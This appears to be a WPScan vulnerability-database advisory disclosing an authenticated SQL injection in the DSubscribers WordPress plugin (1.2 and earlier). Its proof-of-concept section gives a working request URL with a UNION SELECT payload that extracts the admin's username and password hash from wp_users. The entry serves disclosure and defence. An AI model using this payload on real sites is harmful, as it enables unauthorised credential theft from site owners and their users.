DSubscribers <= 1.2 - Authenticated SQL Injection


Proof of Concept

1 – Log in as an admin user.

2 – Request the following URL (the SQL injection is in the dsubscribers parameter):
http://target/wp-admin/admin.php?page=dsubscribers&action=edit&dsubscribers=0 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass) FROM wp_users WHERE ID=1

Affects

Plugin dsubscribers
fixed in version 1.2.1

References

URL http://lenonleite.com.br/en/blog/2017/07/06/dsubscribers-1-2-plugin-wordpress-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite / Log.pt
Submitter Website http://lenonleite.com.br/en/blog/2017/07/06/dsubscribers-1-2-plugin-wordpress-sql-injection/
Submitter Twitter log_oscon
Views 79
Verified No
WPVDB ID 8864

Timeline

Publicly Published 2017-07-06 (23 days ago)
Added 2017-07-16 (12 days ago)
Last Updated 2017-07-16 (12 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.